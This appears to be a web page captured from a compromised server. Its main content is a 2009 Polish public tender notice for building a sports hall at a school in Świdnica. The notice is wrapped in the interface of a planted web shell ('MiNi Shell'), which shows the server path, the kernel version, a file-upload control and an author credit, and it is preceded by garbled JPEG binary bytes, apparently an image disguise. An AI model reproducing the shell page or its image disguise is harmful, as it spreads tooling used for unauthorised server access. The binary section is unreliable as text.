JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/51788-N-2009.html

<p class="kh_header"><b>Świdnica: Budowa Hali Sportowej 
w Zespole Szkół w Świdnicy</b><br>
<b>Numer ogłoszenia: 51788 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świdnica , ul. Długa 38, 66-008 Świdnica, woj. lubuskie, tel. 068 3273115, faks 068 3273127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> swidnica.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Hali Sportowej 
w Zespole Szkół w Świdnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Krótki opis zamówienia
Przedmiotem zamówienia jest budowa hali sportowej z łącznikiem 
i zapleczem na terenie Zespołu Szkół w Świdnicy przy ul. Ogrodowej. Zaprojektowano wielofunkcyjną salę przystosowaną przede wszystkim do prowadzenia zajęć w gimnastyce oraz grach sportowych oraz ćwiczeń i zawodów szermierczych. Wymiar sali sportowej umożliwia ćwiczenia i rozgrywki w piłce siatkowej, koszykowej i ręcznej. Podział kurtynami umożliwi prowadzenie zajęć sportowych jednocześnie 3 grupom. W kubaturę sali wprowadzono rozsuwane trybuny dla ok. 200 osób. Dodatkowo w obiekcie wydzielono zespoły funkcjonalne tzn.: zespół sali ćwiczeń przeznaczonej do prowadzenia gimnastyki korekcyjnej, między innymi dla osób niepełnosprawnych, zespół siłowni, pomieszczenia techniczne oraz magazyny.
Zagospodarowanie ternu:
- budowa hali sportowej wraz z zapleczem i łącznikiem,
- budowa dojazdu do obiektu,
- budowa parkingu z dojazdem do drogi dojazdowej
- budowa sieci uzbrojenia terenu: sieć wod.-kan. sieci gazowej, sieci oświetlenia terenu.

2)	Zestawienie powierzchni 

a)	Powierzchnie zagospodarowania terenu:
- pow. działek budowlanych - 18897m2
- pow. zabudowy hali sportowej - 2040,06m2
- pow. drogi i placów manewrowych - 1825,00m2

b)	parametry techniczne obiektu
- powierzchnia netto sali sportowej - 1241,22m2
- powierzchnia netto zaplecza - 1044,68 m2
                                    RAZEM: 2285,90 m2
- powierzchnia zabudowy sali sportowej -1308,00 m2
- powierzchnia zabudowy zaplecza z łącznikiem - 677,85 m2
- powierzchnia zabudowy magazynu - 54,21 m2
                                    RAZEM: 2040,06 m2
- kubatura Sali sportowej - 12282,12 m3
- kubatura zaplecza z łącznikiem - 5239,23 m3
                                    RAZEM: 17521,35 m3


3)	Rozwiązania materiałowe obiektu
a)	budowlane
- konstrukcja sali sportowej stalowa ramowa, posadowiona na stopach fundamentowych żelbetowych
- fundamenty żelbetowe - ławy oraz ściany fundamentowe
- ściany konstrukcyjne gr.25cm z cegły kratówki K-2 kl.150
- ściany działowe z cegły kratówki
- podłoga w sali sportowej, siłowni, sali ćwiczeń korekcyjnych typu PULASTIC 200RD lub równoważna, pozostałe pomieszczenie - podłogi typowe wg Projektu
- kominy z kształtek ceramicznych
- stropy prefabrykowane żelbetowe typu filigran
- wieńce, schody, słupy i podciągi żelbetowe
- stropodach nad salą z płyt warstwowych typu PWD 150 lub równoważne z rdzeniem poliuretanowym
- stropodach nad zapleczem z papy termozgrzewalnej i ociepleniem termicznym
- izolacje p. wilgociowe i termiczne typowe wg Projektu
- winda osobowa z szybem z cegły pełnej kl.200
b)	instalacyjne
- wykonanie wewnętrznych instalacji sanitarnych - wod.-kan. wentylacji mechanicznej i ogrzewania powietrznego, wentylacji grawitacyjnej, hydrantowej w technologii typowej wg Projektu
- wykonanie wewnętrznych instalacji elektrycznych - oświetleniowej, oświetlenia ewakuacyjnego, gniazd wtykowych, siłowej, sterowania, sygnalizacji i automatyki, piorunochronnej, przeciwporażeniowej i przeciwprzepięciowej w technologii tradycyjnej wg Projektu.

Szczegółowy zakres robót został przedstawiony w Projekcie Budowlanym oraz w STWiOR Budowa Hali Sportowej w Zespole Szkół w Świdnicy, dostępnymi do wglądu w siedzibie Zamawiającego  - Urzędu Gminy Świdnica przy ul. Długiej 38, 66 - 008 Świdnica.

4)	Wyposażenie sali sportowej 

W zakres wyposażenia hali sportowej przewidziano dostawę i montaż następujących urządzeń sportowych:
a) kosze najazdowe typ	SAM 325 lub równoważne 
b) tablice treningowe do koszykówki 
c) kotary (kurtyny) działowe 7x27m
d) drabinki treningowe
e) komplet urządzeń do siatkówki
f) komplet urządzeń do tenisa ziemnego
g) komplet urządzeń do piłki ręcznej
h) trybuny składane na 200 miejsc
i) tablica świetlna główna
j) szafki uczniowskie w szatniach  

Szczegółowe wymagania techniczne urządzeń zostały przedstawione w STWiOR Budowy Sali Sportowej w Zespole Szkół w Świdnicy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 100000,00 zł. 
Wadium musi być wniesione przed upływem terminu składania ofert. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Gminy Świdnica Nr 16102054020000060200278838. Kwota wadium wniesionego w pieniądzu musi wpłynąć na rachunek Zamawiającego najpóźniej do dnia i godziny otwarcia ofert. Zwrot i utrata wadium nastąpi na warunkach określonych w art.46 Ustawy Prawo Zamówień Publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem udziału w postępowaniu jest złożenie przez Wykonawcę:
1.	Oświadczenia własnego o spełnieniu warunków opisanych w art.22 ustawy prawo zamówień publicznych
2.	Oświadczenia własnego, że nie zachodzą przesłanki wykluczające z postępowania na zasadzie art.24 ustawy prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art.24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, Zamawiający żąda następujących dokumentów:
a)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	aktualnych zaświadczeń właściwego Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c)	polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, 
w kwocie ubezpieczenia równej co najmniej 10 % ceny oferty netto. 
d)	oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art.22 ust.1 ustawy Prawo zamówień publicznych.
e)	oświadczenie Wykonawcy że nie zachodzą okoliczności wymienione w art. 24  ustawy Prawo zamówień publicznych
2.	W celu potwierdzenia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
a)	wykaz zatrudnionych osób w liczbie nie mniejszej niż 25 osób, w tym nie mniej niż 3 osoby z uprawnieniami budowlanymi do kierowania robotami w poszczególnych branżach robót. Ponadto należy załączyć dokument potwierdzający posiadanie przez kierowników robót budowlanych ważne zaświadczenie o wpisie do właściwej izby samorządu zawodowego;
b)	wykaz zrealizowanych (nie mniej niż jednego) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówień odpowiadających wartością przedmiotowi zamówienia każdorazowo potwierdzone dokumentami o ich należytym wykonaniu (referencjami). Warunek ten będzie uznany za spełniony, jeśli wartość zrealizowanych robót nie będzie się różnić w dół o więcej niż 20% ceny oferty brutto.
c)	wykaz posiadanego sprzętu budowlanego w minimalnym zakresie jak niżej:
- koparka o poj. naczynia nie mniejszej niż 0,6m3 - 1 szt.
- spycharka gąsienicowa lub kołowa o mocy min. 75 kM - 1 szt.
- zagęszczarka mechaniczna do gruntu 70-90m3/h - 1 szt.
- samochód wywrotka o ładowności 5-10 ton - 1szt.
- żuraw samochodowy o udźwigu 12-16 ton - 1szt.
3.	W celu potwierdzenia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów:
a)	informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w kwocie nie mniejszej niż 20% ceny oferty netto, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Wszystkie kserokopie dokumentów winny być poświadczone za zgodność z oryginałem przez Wykonawcę (data, pieczątka i podpis wykonawcy). 
Zamawiający - na podstawie art. 26 ust. 3 ustawy pzp, wezwie Wykonawców, którzy 
w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia w wyznaczonym terminie konieczne byłoby unieważnienie postępowania. 
Zamawiający wezwie także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 pzp. 
Wykonawca, który nie spełni wszystkich wymogów określonych w siwz zostanie wykluczony z postępowania na podstawie art. 24 ust.1 lub ust. 2 Prawa zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> swidnica.zgora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świdnica, ul. Długa 38, 66-008 Świdnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2009 godzina 10:00, miejsce: sekretariat Urzędu Gminy Świdnica, ul. Długa 38, 66-008 Swidnica.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zadanie jest dofinansowane w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013.
2.	Zamawiający dopuszcza fakturowanie częściowe robót, ale nie częściej niż raz na kwartał.
3.	Zamawiający dopuszcza zmianę treści umowy w przypadku wystąpienia okoliczności, których nie można było przewidzieć w dacie zawarcia umowy lub gdy wprowadzane zmiany są korzystne dla Zamawiającego.
4.	Zamawiający nie wyraża zgody na powierzenie całości zamówienia dla podwykonawców. Wyraża natomiast zgodę na powierzenie dla podwykonawców części robót, tj. w zakresie instalacji sanitarnych, elektrycznych, gazowych i dostawie oraz montażu wyposażenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com